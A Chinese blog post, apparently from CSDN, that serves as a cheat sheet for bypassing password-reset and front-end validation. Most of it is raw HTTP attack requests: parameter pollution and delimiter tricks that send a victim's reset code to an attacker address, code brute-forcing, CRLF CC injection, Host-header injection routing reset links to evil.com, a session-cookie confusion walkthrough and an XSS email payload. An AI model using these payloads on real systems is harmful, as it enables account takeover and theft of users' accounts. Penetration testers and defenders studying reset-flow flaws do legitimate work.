密码找回--绕过前端验证

于 2024-05-19 09:15:00 发布
阅读量244 收藏 4
点赞数 5
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuanJian_GC/article/details/139031792
版权

密码找回

绕过前端验证

不知道密码
  1. 修改响应状态码
响应

...
code: true /success /1
  1. 抓包后删除(username=***&pwaasd=***
  2. 有些系统设定密码是纯数字进入口令修改界面(111111或者222222)
知道密码
  1. 响应包是否回显验证码
  2. 重置跳转时,是否有id类的参数进行任意用户密码修改

邮箱/手机验证码找回

  1. 参数污染
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&email=hacker@mail.com
  1. 验证码爆破
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com&code=$123456$
  1. 在参数值中使用分隔符
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com,hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%20hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com|hacker@mail.com

POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%00hacker@mail.com

  1. 响应包中有指定接收端,可修改接收端号码

  2. 参数值中没有domain

POST /reset HTTP/1.1
Host: target.com
...

email=victim
  1. 没有参数的值
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail
  1. 邮件抄送
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com%0a%0dcc:hacker@mail.com
  1. 如果body请求中有JSON数据,则添加逗号
POST /newaccount HTTP/1.1
Host: target.com
...

{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
  1. 邮箱密码重置链接是否可被构造

请求体字段

  1. Find out how the tokens generate 了解令牌如何生成
  • Generated based on TimeStamp 基于时间戳生成
  • Generated based on the ID of the user 根据用户ID生成
  • Generated based on the email of the user 根据用户的电子邮件生成
  • Generated based on the name of the user 根据用户名生成
  1. 主机标头注入
POST /reset HTTP/1.1
Host: target.com
...

email=victim@mail.com

to

POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...

email=victim@mail.com

受害者将收到重置链接evil.com

  1. cookie混淆
大致攻击思路:
1. 用攻击者账号13908080808进入密码找回流程,查收重置验证码、通过校验
2. 输入新密码后提交,拦截中断该请求,暂不发至服务端,这时,PHPSESSID 关联的是13908080808账号;
3. 接着,关闭浏览器的burp代理,新开重置流程的首页,在页面中输入普通账号13908090133后获取短信验证码,这时,PHPSESSID 已关联成13908090133;
4. 最后,放行之前中断的请求,放至服务端,逻辑上,可以成功重置13908090133的密码。

补充

尝试跨站点脚本(XSS)的形式
XSS

"<svg/οnlοad=alert(1)>"@gmail.com

参考

唐先生的博客
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
文件上传-绕过JS前端验证
T1ngSh0w的博客
09-18 2125
文件上传漏洞染过JS前端验证
网络安全中如何绕过前端验证的功能
最新发布
xs9716的博客
01-25 823
绕过前端验证
绕开前端的JS验证
旧城的博客
11-08 1420
转发:https://www.seoxiehui.cn/article-72320-1.html 绕开前端的JS验证通常有以下的方法: 方法一: 将页面保存到自己机器上,然后把脚本检查的地方去掉,最后在自己机器上运行那个页面就可以了; 方法二: 该方式与方法一类似一样,只是将引入js的语句删掉,或则将引入的js后缀名更换成任意的名字,就OK; 方法三: 在浏览器地址栏中直接输入请求URL及参数,...
绕过前端验证
qq_22192367的博客
03-16 9509
这是一个注册页面,随便输入一个的昵称,可以看到如下图所示的界面,burpsuit没有任何的ajax请求,直接弹出了不正确所以这个验证肯定是前端方面的验证,先构造一个符合标准的数据进行提交看看他的POST包长什么样可以看到所有的数据都进行了加密,一开始我以为是都进行了md5加密,然后去md5加密网站把密码加密对比了一下,发现并不是md5,而是一种前端验证。感觉游戏,因为前端验证严格的后段可能就忽略...
关于前端加密登陆绕过的渗透思路
Adminxe的博客
08-22 1963
0x00 前端加密 好就不发博客了,今天主要讲一下前端加密绕过前端加密,判断加密类型,根据加密类型,找到对应解密形式,同时如果存在简单前端校验时,比如js绕过,base64编码,这样的话就会简单很多,但对于AES加密时,我们就首先要熟悉AES的加密规则。 0x01 关于AES加密规则 https://www.cnblogs.com/starwolf/p/3365834.html 附上链接,AES五种加密模式(CBC、ECB、CTR、OCF、CFB)。 c++源码: /** *@param..
前端js验证
11-14
- 尽管前端验证提高了用户体验,但不能完全依赖它,服务器端验证仍然是必要的,以防恶意用户绕过前端验证。 - 保护用户隐私,不要在前端验证中暴露敏感信息,如密码哈希等。 9. **性能优化**: - 避免不必要的...
验证-
02-12
这些特性使得开发者可以轻松地实现基本的客户端验证,但它们并不完全安全,因为用户可以绕过这些验证,直接与服务器通信。 为了更全面的安全验证,通常需要在服务器端进行二次验证。例如,使用PHP、Java、Python等...
前端项目-openpgp.zip
09-02
8. **安全性注意事项**:虽然客户端加密提高了隐私,但恶意用户可能通过注入脚本等方式绕过前端加密,因此前端加密不能替代服务器端的安全措施,应结合使用。 9. **性能优化**:OpenPGP算法可能对计算资源要求较高...
前端项目-expressive-annotations-validate.zip
09-03
Expressive Annotations支持与服务器端验证机制的配合,确保即使有恶意用户绕过前端验证,后端也能检测到并阻止无效的数据。 5. **源码结构**:在"ExpressiveAnnotations-master"目录下,我们可能会看到以下文件和...
漂亮表单验证密码强度的验证
10-14
前端验证的优点在于可以实时反馈错误,提高用户体验,但缺点是容易被绕过,所以后端验证同样必不可少。 在前端验证中,我们可以通过监听表单的提交事件,对每个输入字段进行检查。例如,检查邮箱格式是否正确,电话...
js前端验证绕过
weixin_34082789的博客
02-13 2873
一、js前端验证 本篇基于上篇,修改了form.html 1 <!DOCTYPE html> 2 <html lang="en"> 3 <head> 4 <meta charset="UTF-8"> 5 <meta name="viewport" content="width=device-width,...
绕开前端验证直接交互后台
天才战士的博客
04-12 3121
为什么前端已经验证了条件后台还需要验证一次呢?举例:对于一个不懂前端的人来说,它确实是不可编辑的。但是对于稍微懂点前端调试的来说,他就可以这样结果就不同说了吧,他可以填写保存了,这时候你是不是觉得后台验证很有必要了。这还只是更改前端页面方式,很简单的方法。如果借助工具你可以直接截取你的访问地址,修改里面的传送参数,再重新发给服务器。Fiddler可以了解一下。这是我写的一个spring+sprin...
CTF 绕过前端JS加密进行密码爆破
baynk的博客
03-23 2905
这头像真是骚气的。。。 随意输入了下用户名和密码,有提示 再试了下admin 看来用户名已经OK了,关键是密码了,直接丢Burp中去。 发现密码好像被加密了,那就只有可能是前端来完加密的,先去前端找JS. 这个有个Base64。。刚刚开始我以为就是通用的base64,于是去用burpsuite中自带的加密进行处理。。 结果自然悲剧了,,,因为没跑同来,自己去查了下JS,JS好像没有自带b...
前端验证绕过 靶场实战
weixin_54771278的博客
06-08 1301
实验介绍 1. 验证前端可获取 (1)验证码隐藏在源码之中 验证这种情况很简单,我们只需要记住验证码,然后右键打开网站源代码,CtrI+F搜索,输入刚才的验证码,如果可以成功匹配到 (2)验证码隐藏在Cookie中 一般来说,我们会把验证码的值用Session存储起来,通过对比用户提交的验证码和Session中的验证码,就可以知道输入是否正确。由于Session会占用服务器资源,有的开发人员会把验证码的值加密后存储在Cookie中。 (3)仅在客户端生成验证码 有的网站验证码由本地js生成仅仅..
文件上传2----前端JS验证与后端文件类型验证绕过
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
05-25 1517
一、前端过滤绕过(Less-1) 前期准备: 菜刀、php一句话木马一个。 情况描述: 按照题目要求,需要上传一个图片。但是我们准备的是一个php的木马文件。先上传试一下。结果发现,对文件后缀名进行了校验,要求输入特定后缀的文件。 对于文件后缀名的校验,无非前端和后端两种,先看一看前端源码,解雇,发现确实是前端JS验证导致的问题。 既然是前端校验,那方法就多了呀,首先可以考虑修改源码的匹配规则,或者是通过伪造后缀名绕过前端验证之后修改后缀名进行上传。 方法一:修改源码 刷新题目页面,通过burp代理截断
绕开客户端JS验证
柠檬树
06-18 4383
我们在进行表单提交之前往往要进行表单校验,如文本框是否为空?是否包含为法字段?然而在进行web开发的过程中仅仅进行前端校验是远远不够的。因为能通过一些方式跳过前端的校验,因此服务端也非常有必要写校验的方法。
如何跳过前端JavaScript的验证
weixin_38168322的博客
08-30 2433
经常听别人说不要把验证的功能放在前端,因为别人可以通过其他的方法跳过前端的校验,从而达到绕过前端验证。 那么是如何绕过前端验证的?有很多的方法,我这里说一种方法。 1、就是先把网站下载下来保存到本地。 2、下载完之后改js里面的action地址,一般都是相对地址来的,直接改为网站的绝对地址就好了。 3、改完之后,把一些前端验证方法删除掉,然后试着提交数据,就可以绕过前端校验了...
绕过加密爆破:Web登录账号密码的渗透测试策略
总结来说,这些方法提供了针对前端加密登录的渗透测试策略,旨在绕过加密保护,以便进行有效的爆破尝试。对于网络安全专家来说,理解和应对这类加密机制是提高渗透测试效率的关键。然而,这些技巧也提醒开发者,单纯...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唐先生的博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值